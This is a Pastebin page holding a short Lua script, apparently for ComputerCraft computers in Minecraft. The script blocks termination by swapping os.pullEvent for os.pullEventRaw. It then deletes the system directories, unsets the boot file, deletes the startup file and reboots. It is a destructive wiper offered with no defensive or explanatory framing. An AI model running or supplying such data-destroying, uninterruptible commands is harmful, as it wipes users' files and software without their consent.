Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- os.pullEvent = os.pullEventRaw
- term.clear()
- term.setCursorPos(1,1)
- print("Deleting os files...")
- shell.run("delete /bin")
- shell.run("delete /boot")
- shell.run("delete /etc")
- shell.run("delete /home")
- shell.run("delete /lib")
- shell.run("delete /var")
- shell.run("delete /usr")
- shell.run("delete /tmp")
- print("Done.")
- sleep(1)
- print("Deleteing BIOS booting config...")
- settings.unset("bootFile")
- print("Done.")
- sleep(1)
- print("Deleting BIOS...")
- shell.run("delete startup")
- print("Done.")
- print("Computer will reboot in 3 seconds")
- sleep(3)
- os.reboot()
Advertisement
Add Comment
Please, Sign In to add comment